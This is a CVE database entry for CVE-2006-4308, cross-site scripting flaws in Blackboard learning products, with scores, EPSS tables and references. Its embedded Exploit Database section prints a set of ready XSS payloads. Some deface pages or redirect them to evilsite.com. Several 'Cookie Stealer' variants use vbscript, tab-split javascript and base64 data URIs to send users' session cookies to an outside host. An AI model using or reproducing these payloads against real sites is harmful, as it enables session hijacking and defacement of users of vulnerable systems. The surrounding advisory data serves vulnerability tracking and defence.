CVE-2006-4308

CVE Descriptions

Multiple cross-site scripting (XSS) vulnerabilities in Blackboard Learning System 6, Blackboard Learning and Community Portal Suite 6.2.3.23, and Blackboard Vista 4 allow remote attackers to inject arbitrary Javascript, VBScript, or HTML via (1) data, (2) vbscript, and (3) malformed javascript URIs in various HTML tags when posting to the Discussion Board.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	4.3		AV:N/AC:M/Au:N/C:N/I:P/A:N	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.13%	–	–
2022-03-06	–	–	3.13%	–	–
2022-04-03	–	–	3.13%	–	–
2022-05-15	–	–	3.13%	–	–
2022-12-18	–	–	3.13%	–	–
2023-01-01	–	–	3.13%	–	–
2023-02-05	–	–	3.13%	–	–
2023-03-12	–	–	–	0.96%	–
2023-05-21	–	–	–	1.34%	–
2023-07-02	–	–	–	1.29%	–
2023-08-06	–	–	–	1.63%	–
2023-10-22	–	–	–	1.08%	–
2023-12-03	–	–	–	0.96%	–
2023-12-24	–	–	–	0.96%	–
2024-02-11	–	–	–	0.96%	–
2024-06-02	–	–	–	0.96%	–
2024-06-02	–	–	–	0.96%	–
2024-08-25	–	–	–	0.96%	–
2024-12-22	–	–	–	0.79%	–
2025-02-16	–	–	–	0.79%	–
2025-01-19	–	–	–	0.79%	–
2025-02-16	–	–	–	0.79%	–
2025-03-18	–	–	–	–	0.92%
2025-04-11	–	–	–	–	0.96%
2025-04-11	–	–	–	–	0.96,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	65%
2022-03-06	66%
2022-04-03	82%
2022-05-15	83%
2022-12-18	84%
2023-01-01	83%
2023-02-05	84%
2023-03-12	81%
2023-05-21	84%
2023-07-02	84%
2023-08-06	86%
2023-10-22	83%
2023-12-03	81%
2023-12-24	82%
2024-02-11	83%
2024-06-02	83%
2024-06-02	83%
2024-08-25	84%
2024-12-22	81%
2025-02-16	82%
2025-01-19	81%
2025-02-16	82%
2025-03-18	74%
2025-04-11	75%
2025-04-11	75%

Exploit information

Exploit Database EDB-ID : 28324

Publication date : 2006-08-23 22h00 +00:00
Author : proton
EDB Verified : Yes

source: https://www.securityfocus.com/bid/19308/info Blackboard products are prone to multiple HTML-injection vulnerabilities because the software fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. Blackboard Learning System (Release 6) and Blackboard Learning and Community Portal Suite (Release 6 build 6.2.3.23) are vulnerable; other version may also be affected. Reports indicate this issue has been addressed in versions 7.0 and 7.1, but Symantec has not confirmed this. UPDATE (June 14, 2007): Reports indicate that Blackboard Academic Suite - Vista 4 is also vulnerable. Defacement (FrameBuster) ------------------------- <meta http-equiv="refresh" content="15;url= http://evilsite.com"> Defacement (FrameBuster) ------------------------- <iframe src=" http://evilsite.com" width=100 height=100></iframe> Defacement (IE ONLY) ------------------------- <img src=vbscript:document.write("defaced_by_insane_script_kiddies")> Defacement (IE ONLY) ------------------------- <link rel="stylesheet" href=vbscript:document.write("defaced_by_insane_script_kiddies")> Cookie Stealer (IE ONLY) ------------------------- <img src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/> <img src="vbscript:window.focus ()"style=visibility:hidden/> <img src="vbscript: window.close()"style=visibility:hidden/> Cookie Stealer (IE ONLY) ------------------------- <link rel="stylesheet" href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)"> Cookie Stealer (Encoded Tab - IE ONLY) ------------------------- <img src="jav	ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> Cookie Stealer (html encoded - IE ONLY) ------------------------- <img src='javascripdocument.images[1].s rc=" http://evilsite.com"+document.cookie;'<img src="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> Cookie Stealer (tabs - IE ONLY) ------------------------- <img src="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> Cookie Stealer (body tag with tabs - IE ONLY) ------------------------- <body background="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"> Cookie Stealer (div tag with tabs - IE ONLY) ------------------------- <div style="background-image: url(jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)"> Cookie Stealer (firefox) ------------------------- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4="> Cookie Stealer (firefox - click to work) ------------------------- <a href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>

Products Mentioned

Configuraton 0

Blackboard>>Blackboard >> Version 6.0

Blackboard>>Blackboard_learning_and_community_portal_suite >> Version 6.0

Blackboard>>Blackboard_learning_and_community_portal_suite >> Version 6.2.3.23

Blackboard>>Vista >> Version 4

References

http://www.securityfocus.com/bid/19308
Tags : vdb-entry, x_refsource_BID

http://www.securityfocus.com/archive/1/444885/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://www.vupen.com/english/advisories/2006/3366
Tags : vdb-entry, x_refsource_VUPEN

http://www.securityfocus.com/archive/1/444062/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

https://exchange.xforce.ibmcloud.com/vulnerabilities/28537
Tags : vdb-entry, x_refsource_XF

http://www.securityfocus.com/archive/1/444116/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://secunia.com/advisories/21577
Tags : third-party-advisory, x_refsource_SECUNIA

http://securitytracker.com/id?1016735
Tags : vdb-entry, x_refsource_SECTRACK

CVE-2006-4308 : Detail